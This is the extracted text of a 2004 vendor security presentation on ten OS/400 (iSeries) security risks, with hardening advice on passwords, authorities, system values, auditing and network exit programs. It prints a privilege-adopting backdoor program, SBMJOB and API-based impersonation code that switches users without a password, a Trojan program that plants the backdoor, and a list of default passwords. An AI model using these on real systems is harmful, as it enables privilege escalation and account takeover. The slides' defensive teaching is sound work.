Top 10 OS400 Security Risks

Definitive iSeries Security
P R E S E N T A T I ON
Top 10 OS/400
Security Risks
October 2004
John Earl
Chief Technology Officer
The PowerTech Group

www. powertech.com
john.earl@ powertech.com
Copyright (c) 1999 - 2002 The Powertech

Group
Copyright & Disclaimer

This information is meant for the edification of the OS/400 user
community. It is my sincere desire that you use this information
to your advantage and make your systems more secure with it.
As with any software modification, you should test the impact of
these recommendations before implementing them on
production systems. Because every system is potentially
different, neither I nor The PowerTech Group can assume any
responsibility for any adverse effects of improperly tested
implementations.
And finally, to protect our copyright (and out of common courtesy to
the author), we respectfully request that you do not reproduce
this material in any advertisement, web-site, or other printed
format without the expresses written consent of the copyright
holder.
www.powertech.com
info@powertechgroup.com

Group
2003 PowerTech Group, Inc. All rights reserved.
PowerTech/IBM Relationship
> Multi-level
Executive through developer
> Partner Programs
System Mgmt Partner Group

Advanced Development Partner
> Business with Global Services
Worldwide agreement with IGS

IGS recommends PowerTech with engagements
Installed in IBM outsourced clients
> Installed in IBM San Jose, Rochester, NY,

www.powertech.com

Group
HACKERS!!!
www.powertech.com
or

Group
The Biggest Threat

to your Corporate Data
Your Company
Enterprise Security Evolution
www.powertech.com

Group
Source Code for a Secret Terrible

and Dastardly Hacking Program
> Source code for program: QSYS/QBACKDOOR:

PGM
CALL QCMD
ENDPGM
> When compiled to adopt a powerful users authority, this

program is dangerous without limits.
www.powertech.com

Group
Top 10 OS/400 Security Risks

Agenda
Introduction
The Top 10
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
User Identity Theft

Powerful Users
System Value Weaknesses
Library and Library List Problems
The Open Door Policy
Promiscuous Object Ownership
Command Interface Abuse
Trojan Horses
No Audit Ability
Unprotected Network Access
Conclusion
www.powertech.com

Group
User
Identity Theft
> There are 5 well known ways to steal

an OS/400 User IDs.
From the difficult to the easy, they are:

1.
2.
3.
4.
5.
www.powertech.com
Use an OS/400 Job Description to masquerade as

the user
Use the Submit Job Command (SBMJOB) to
masquerade as the user
Use IBM APIs to Switch to the user (no password
required)
Sniff Network traffic to find clear text passwords
Beg, borrow, steal or guess their password

Group
User
Identity Theft
Use an OS/400 Job Description to

masquerade as the user.
A JOBD that has a User ID specifically attached to it

represents the ability to run a job as that user. Without
knowing the users password.
This exposure is only for those systems running at OS/400
QSECURITY level 30 and lower.
At QSECURITY level 30 and lower, the user needs only *USE (Read) authority to the
Job Description.
Example:
SBMJOB CMD(CALL PGM(QSYS/CRTCLPGM
PGM(QSYS/QBACKDOOR)
SRCFILE(MYLIB/QCLSRC)
OPTION(*NOSRC) GENOPT(*NOLIST)
USRPRF(*OWNER) LOG(*NO)
ALWRTVSRC(*NO) AUT(*ALL)))
JOB(REPORT) JOBD(QGPL/QBATCH) USER(*JOBD)
> Solution? Move to QSECURITY level 40 or

higher.
www.powertech.com

Group
User
Identity Theft
Use the Submit Job Command (SBMJOB) to

masquerade as the user
The SBMJOB command allows the submitter to

specify the name of another user, and have the
submitted job run using the assumed identity. All
that is required is *USE (Read) authority to the
target User Profile Object.
Example:
SBMJOB CMD(CALL PGM(QSYS/CRTCLPGM
PGM(QSYS/QBACKDOOR)
SRCFILE(MYLIB/QCLSRC)
OPTION(*NOSRC) GENOPT(*NOLIST)
USRPRF(*OWNER) LOG(*NO)
ALWRTVSRC(*NO) AUT(*ALL)))
JOB(REPORT) JOBD(QGPL/QBATCH) USER(SALLY)
www.powertech.com

Group
10
User
Identity Theft
Use IBM APIs to Switch to the user (no

password required)
The following code will allow me to become

someone else without knowing their password.
Program QSYS/QASSUME
!
!
!
d
e
r
o
s
n
Ce
PGM PARM(&USER)
DCL
&USER
*CHAR 10
DCL
&HANDLE
*CHAR 10
DCL
&ERROR
*CHAR
4
CHGVAR %BIN(&ERROR)
0
CALL
'QSYGETPH
PARM(&USER *NOPWD &HANDLE &ERROR)
CHGVAR %BIN(&ERROR)
0
CALL
'QWTSETP PARM(&HANDLE &ERROR)
ENDPGM
www.powertech.com

Group
11
User
Identity Theft
Sniff Network traffic to find clear text

passwords
Several Protocols submit User IDs and

Passwords in clear text
www.powertech.com
Among them are FTP, Telnet, and older forms of Client

Access and PC Support
Minimize use of the legacy OS/400 Sign-on

Screen (QDSIGNON)
Set the Client Access Bypass Signon flag to yes,
and the OS/400 system value for QRMTSIGN to
*VERIFY
Use VPNs when communicating over un-secure
networks

Group
12
User
Identity Theft
Beg, borrow, steal, or guess their

password.
Password Protection is the Best Defense!
www.powertech.com
AS/400 requires a password to in order to access

A solid password policy will prevent most breaches from the
outside and from nefarious insiders too.
Dont send passwords via email, or over un-secured networks.
Require that passwords be changed at regular intervals.
Dont EVER use default passwords

Group
13
User
Identity Theft
All of the Default passwords are well known!

Subject: alt.2600 FAQ (1/3) #18/
From:
quinny@bigfoot.com
Forums: alt.2600
Message segment 18 of 63 - Get Previous / Next Segment - Get All 63 Segments
AS/400
~~~~~~
qsecofr
qsysopr
qpgmr
ibm
ibm
ibm
qsecofr
qsecofr
qserv
qsvr
secofr
qsrv
qsecofr
qsysopr
qpgmr
password
2222
service
1111111
2222222
qserv
qsvr
secofr
ibmce
/* master security officer */

/* system operator
*/
/* default programmer
*/
(Get All 63 Segments)

www.powertech.com

Group
14
User
Identity Theft
Prevent Trivial Passwords:
At a minimum, set these system values:

System Value Name
Value
QPWDEXPITV
QPWDMINLEN
QPWDRQDDGT
QPWDRQDDIF
90
6
1
5
www.powertech.com
Description
90 Days
6 Character Minimum length
Require a digit
Unique in 10
Dont go too wild with password rules (the QPWD*

system values), or your users wont remember
their passwords!

Group
15
Powerful
Users
> Users can be made more powerful through

the granting of OS/400 Special Authorities
Special Authorities can trump OS/400 object

level authorities.
A USER WITH *ALLOBJ CAN READ, CHANGE, OR DELETE
ANY OBJECT ON THE SYSTEM.
A USER WITH *SPLCTL CAN READ, CHANGE, OR DELETE
ANY SPOOL FILE ON THE SYSTEM.
A USER WITH *JOBCTL CAN VIEW, CHANGE, OR STOP ANY
JOB ON THE SYSTEM (INCLUDES ENDSBS AND PWRDWNSYS)
A USER WITH *SAVSYS CAN READ OR DELETE ANY OBJECT
ON THE SYSTEM.
www.powertech.com

Group
16
Powerful
Users
> What do special authorities do?
*ALLOBJ - ALL authority to every object on

the system Game Over!
*AUDIT - Authority to manipulate system
auditing values.
*IOSYSCFG - Authority to create and modify
communications to the system.
*JOBCTL- Authority to control other users
jobs.
www.powertech.com

Group
17
Powerful
Users
>What do special authorities do?
*SAVRST - Authority to Save,Restore, and

remove any object on the system.
*SECADM - Authority to change Profiles and
Passwords
*SERVICE - Authority to use the system
service tools.
*SPLCTL - *ALLOBJ authority for spool files.
www.powertech.com

Group
18
System Value
Weaknesses
There are several system values must be

set properly to protect your system.
Set the System Values to their most protective

setting and then toggle them off/on as
needed.
Monitor System Values to detect and alert you
whenever they are changed.
Ensure that those system values are changed back

Monitor for Toggle off / Toggle On conditions
Monitor what is done while System Values are toggled
off
www.powertech.com

Group
19
System Value
Weaknesses
Signon Control
Regulate signon to prevent attacks
QDSPSGNINF
*DSCJOB
Maximum invalid signon attempts allowed.
Disable User after N invalid signon attempts
QRMTSIGN
When job is timed out, disconnect job and show signon screen.
QMAXSGNACN
30
Time out a screen after 30 idle minutes.
QMAXSIGN
QINACTMSGQ
Display the signon information screen.
QINACTITV
*VERIFY
Allow user to bypass legacy signon screen.
www.powertech.com

Group
20
System Value
Weaknesses
Malicious Programs
Prevent Malicious programs from being
loaded to your system by setting these
system values:
QALWOBJRST
Force object conversion on restore.
QVFYOBJRST
*NONE
Do not allow sensitive program restore.
QFRCCVNRST
Signed objects must be valid upon restore.
www.powertech.com

Group
21
System Value
Weaknesses
Operating System Integrity Setting

Use these Settings to ensure system
Integrity at all times:
QSECURITY =
QSECURITY supports 5 levels
40 or 50
10 = Physical Security
20 = Password Security
30 = Resource Security
40 = Operating System Security
50 = Enhanced Operating System Security
Do not allow programs to bypass OS security.
www.powertech.com

Group
22
Libraries and
Library Lists
Libraries are collections of data that a user

can access.
If a user has *EXCLUDE authority to a library,

they cannot access anything in that library.
If a user has *USE authority to a library, they can
read change or delete objects in that library
Assuming they have authority to the object itself.
A user with *USE plus *ADD authority can place

new objects into a library
A user with *ALL authority can delete the library
Libraries are your first line of defense.
www.powertech.com
Grant users no more than *USE authority to

production libraries
Specify *EXCLUDE for sensitive libraries

Group
23
Libraries and
Library Lists
A library list specifies the order in which objects and files

are searched for.
The ability to place objects in a library that is higher on the
library list (assuming *USE plus *ADD capability),
represnts the ability to skirt many security designs
Example:
If the library list contains LIBA, LIBB, and LIBC

And security checking program PROGZ exists in LIBC
And useer Fred has *USE + *ADD authority to LIBA
User Fred could place a bogus version of PROGZ into LIBA that bypasses
security
Solution:
Users only need *USE authority to libraries in their library list.

This is especially true of libraries on the system portion of the
library list (System Value QSYSLIBL)
www.powertech.com

Group
24
The Open
Door Policy
> Every OS/400 object specifies some kind of

authority for a user called *PUBLIC?
WHO IS *PUBLIC?
Any user of this computer who does not have explicit
authority to a given object.
In the old days *PUBLIC was Everyone in my

company.
Then as we networked to more and more systems, *PUBLIC
became every one you do business with (Customers,
Vendors, Partners, etc.)
With virtually every network connected to every other
network (its called The Internet!), *PUBLIC could be
anyone in the WORLD that can connect to your network!!!
In a perfect world, *PUBLIC should have little or no
authority to production applications.
www.powertech.com

Group
25
The Open
Door Policy
> At a maximum, Business Application users

need no more than;
*USE Authority to static objects such as:
Programs, Display Files, Print Files, Work Management Objects, etc. All
static objects (those that do not contain data in one form or another) will work
for users that have only change.
*CHANGE Authority to dynamic objects such as:
Data Files, Data Areas, Data Queues, Message Queues, etc. Those things that
regularly change as a matter of normal business.
> But ideally, dont give *PUBLIC even read

(*USE) authority to anything that you wouldnt
want published on the Internet tonight.
> Look at the QCRTAUT system value to see
what authority *PUBLIC is given by default to
newly created objects.
www.powertech.com

Group
26
Promiscuous
Object Ownership
> Promiscuous Object Ownership is where

end users belong to a group profile that
owns all of the application objects.
This plan makes it easy to administer security

because everyone has all rights based solely
on their membership in the ownership group.
This plan often assumes that all application
access will take place through a predefined
menu interface thereby restricting what a
user can actually see and change.
www.powertech.com

Group
27
Promiscuous
Object Ownership
> Why is this a problem?
Users are no longer locked into green screen

interfaces and dumb terminals.
There are numerous ways of getting at the
data
Command
Line access
DFU, DBU, EZView and other Data manipulation tools
QUERY/400, SQL, and othjer query tools
Others???
Make sure that youve got all the back doors

(and Windows!) covered as well.
www.powertech.com

Group
28
Command Line
Interface Abuse
> The ability to execute commands allows a

user to skirt traditional menu limitations.
Commands can be entered in a variety of

ways:
1.
2.
3.
4.
5.
6.
OS/400 Command line (Call QCMD)

OS/400 Screens that display a command line
(WRKOUTQ, WRKWTR etc.), or other applications
with hidden command line access keys.
Through the use of the Attention Key.
Using FTP to issue a command remotely.
Using DDM to issue a command remotely.
Using Client Access to issue a command remotely.
www.powertech.com

Group
29
Command Line
Interface Abuse
> Control users access to commands by
Use the Limited Capability parameter (LMTCPB) on

the OS/400 user profile to limit items 1-4 on the
previous page.
Beware that items 5 and 6 on the previous page do

not adhere to the LMTCPB parameter limitations
Assuming OS/400 V4R2 or higher.
Use an exit program to limit DDM and Client Access commands.
Some users will still require Command line access.
Programmers, Operators, Vendors, and selected Power Users
www.powertech.com

Group
30
www.powertech.com

Group
Command Line
Interface Abuse
31
A Trojan
Horse
> Program QSYS/QTROJAN
www.powertech.com
QSYS/DCL
&ALLOBJ *CHAR 10
QSYS/ DCL
&COUNT *DEC
(3 0)
QSYS/ DCL
&SPCAUT *CHAR 100
QSYS/ DCL
&START *DEC
(3 0) VALUE(1)
QSYS/MONMSG CPF0000
d
e
r
o
!
!
!
QSYS/RTVUSRPRF SPCAUT(&SPCAUT)
LOOP: IF (&COUNT *LE 10)
QSYS/ CHGVAR VAR(&ALLOBJ) VALUE(%SST(&SPCAUT &START 10))
QSYS/IF
COND(&ALLOBJ = 'ALLOBJ') THEN(DO)
QSYS/CRTCLPGM PGM(QSYS/QBACKDOOR) SRCFILE(MYLIB/QCLSRC) +
OPTION(*NOSRC) GENOPT(*NOLIST) +
USRPRF(*OWNER) LOG(*NO) ALWRTVSRC(*NO) +
AUT(*ALL)
QSYS/RETURN
QSYS/ENDDO
QSYS/CHGVAR VAR(&COUNT) VALUE(&COUNT + 1)
QSYS/CHGVAR VAR(&START) VALUE(&START + 10)
QSYS/GOTO LOOP
s
n
e
C

Group
32
Trojan
Horses
> A malicious person who hides a Trojan Horse on your

system will (generally) have the following goals:
Have the program assume high levels of authority

Be able to run the program at will
Hide the program from the system administrators
Have the program execute often, and by a variety of users.
> An IBM exit point program that can be deleted (and/or

replaced) by someone other than the System
Administrator represents an opportunity for a Trojan
Horse.
> *USE authority is sufficient to run these exit programs. Anything more, and
you are at risk of introducing a Trojan Horse.
www.powertech.com

Group
33
Trojan
Horses
> System Values
QATNPGM
QPWDVLDPGM
QRMTSIGN
QSTRUPPGM
> Network Values
PCSACC
DDMACC
(WRKSYSVAL)
- Attention program
- Password validation program
- Remote sign-on control
- Startup program
(CHGNETA)
- PC Support exit point
- DDM exit point
> Registration Info (WRKREGINF)
ADDEXITPRG
www.powertech.com
- Add Exit Program
Hundreds of program opportunities here

Group
34
Trojan
Horses
> Message Files
DFTPGM parameter allows a default handling program.
10s of thousands of Message Queues.
> Subsystems
(CHGMSGD)
(CHGSBSD)
Routing and Communication Entries contain program

names.
> Database Triggers (ADDPFTRG)
Use PRTTRGPGM to monitor trigger usage
> Command Exit Programs
Monitor command exits (V4R5) and validation programs
www.powertech.com
Over 2000 OS/400 commands

Group
35
No Audit
Ability
> If you had a security problem, would you know?
Who did it?

What happened?
When it happened?
How it was done?
How to stop it from happening again?
> What if the data was not damaged, but only stolen?
www.powertech.com

Group
36
No Audit
Ability
> In order to prevent security breaches, you

must first be able to detect them.
> Use the OS/400 security auditing journal
(QAUDJRN) to help determine where your
security stands.
Why?
Its free (from IBM)
Its a comprehensive gathering tool
Its an irrefutable source of historical events.
www.powertech.com

Group
37
No Audit
Ability
> Turn on OS/400 Security Auditing by typing:

CHGSECAUD
QAUDCTL(*AUDLVL)
+
QAUDLVL(*AUTFAIL *CREATE *DELETE +
*JOBDTA *NETCMN *OBJMGT +
*OFCSRV *OPTICAL *PGMADP +
*PGMFAIL *PRTDTA*SAVRST +
*SECURITY *SERVICE *SPLFDTA +
*SYSMGT )
+
INLJRNRCV(SECURLIB/AUDRCV0001)
> This will generate a lot of audit trails

> Use tools to sift through the audit trails to find
important events.
> If at all possible, save all security journal receivers.
> Make sure QAUDENDACN is *NOTIFY.
www.powertech.com

Group
38
10
Unprotected
Network Access
> Some facts about iSeries Security
DB2/400 database is integrated with the operating system.

Users have all of the authority that their group IDs carry,
and in many purchased software applications, Group IDs
own the application data.
OS/400 ships with all of its TCP/IP services turned on.
These network services provide authorized users access to
application data.
If you do not have Exit Programs in place, you likely are at
risk of sharing OS/400 data with every user on your network
PowerLock NetworkSecurity is an iSeries host based
Access Control and Monitoring software package that
protects application data from too-powerful users.
www.powertech.com

Group
39
10
Unprotected
Network Access
> Most AS/400s rely on menu security
It was easy to build

Its the legacy of many S36 and S/38 applications
> Most menu Security designs assume:
All access is through the application menu.

No users have command line access.
Query access is limited or denied completely.
That the user is a member of the group that owns
the objects. Or
*PUBLIC has Broad access to the data
www.powertech.com

Group
40
10
Unprotected
Network Access
> Menu Security is no longer relevant in a

networked environment.
Users are all using PCs not dumb terminals

PCs have sophisticated data access tools like
FTP, ODBC, Remote Command and more.
End users are much more sophisticated many
hit the workforce with a pre-existing familiarity with
these tools.
> Dont believe that the 5250 green screen is

the End of your security responsibility.
www.powertech.com

Group
41
10
Result: Too Much Access
Application Menu
CRM
www.powertech.com

Group
42
10
www.powertech.com

Group
Unprotected
Network Access
43
Unprotected
Network Access
Some of the network access methods
10
CLIENT ACCESS/400*
Windows Network
Neighborhood
Shared Folders
Shared Printers
FTP
Get File transfer

Put File Transfer
Remote Command
ODBC
Data Queue access
NetServer
Get File
Put File
Delete File
Delete Library
Remote Command
DDM
Copy File
Remote Command
DRDA
Shared Folders
Etc.
There are over 250 access points to an iSeries database!

www.powertech.com

Group
44
10
Unprotected
Network Access
How do you regulate network access to data?

> Implement Exit Programs on network access points like
FTP, ODBC, DDM, etc.
Exit Programs can
Will protect systems that are reliant solely on menu security.
Can be used to limit what trading partners can see when they access
your system.
Monitor access that normally fly beneath your radar
Stops unwanted activity even when youre not around.
Provide defense in depth security beyond traditional controls
www.powertech.com

Group
45
10
Unprotected
Network Access
What is an exit point anyway?

A point in a process where control can be passed to a usersupplied program. The user-supplied program can usually
perform processing that overrides or compliments the
processing done by the main process.
Main program
IBMs FTP Server

1. User requests data:
2. FTP Server calls exit
program
3. Exit Program returns result
Continue processing...
www.powertech.com

Group
User specified
exit program
Analyze request &
return result
(pass/fail)
46
10
iSeries Network Access with

Network Security in Place
E
X
I
T
FTP Server
TELNET Server
Database Server
P
DDM Server
R
SQL Server
DRDA Server
File xfer Server
O
G
R
A
M
Network Security software that controls and monitors

access to the iSeries through the network interfaces.
www.powertech.com

Group
47
10
Prevent Data Theft and Loss
DISTRIBUTORS
EMPLOYEES
Provides:
Visibility to Network
activity
Control of Network
Activity
SUPPLIERS
Security Monitoring
www.powertech.com

Group
48
Conclusions
> Security on OS/400 doesnt just

happen, you have to make it happen.
> OS/400 has the best Security tools
available, so lets use them
> You cant play in e-business unless you
guard against network access
> If you are compromised, will you know?
> Secure network access points before
someone else discovers the exposure.
www.powertech.com

Group
49
Thank You
Contact Info:
John Earl
Chief Technology Officer
The PowerTech Group
john.earl@powertech.com
253.872.7788 x302
www.powertech.com

Group
50

Top 10 OS400 Security Risks

Загружено:

Сведения о документе

Исходное описание:

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Top 10 OS400 Security Risks

Загружено:

Авторское право:

Доступные форматы

Definitive iSeries Security

The PowerTech Group

Copyright (c) 1999 - 2002 The Powertech

Copyright & Disclaimer

Copyright (c) 1999 - 2002 The Powertech

2003 PowerTech Group, Inc. All rights reserved.

Executive through developer

> Partner Programs

System Mgmt Partner Group

> Business with Global Services

Worldwide agreement with IGS

> Installed in IBM San Jose, Rochester, NY,

Copyright (c) 1999 - 2002 The Powertech

2003 PowerTech Group, Inc. All rights reserved.

Copyright (c) 1999 - 2002 The Powertech

The Biggest Threat

2003 PowerTech Group, Inc. All rights reserved.

Enterprise Security Evolution

Copyright (c) 1999 - 2002 The Powertech

2003 PowerTech Group, Inc. All rights reserved.

Source Code for a Secret Terrible

> Source code for program: QSYS/QBACKDOOR:

> When compiled to adopt a powerful users authority, this

Copyright (c) 1999 - 2002 The Powertech

2003 PowerTech Group, Inc. All rights reserved.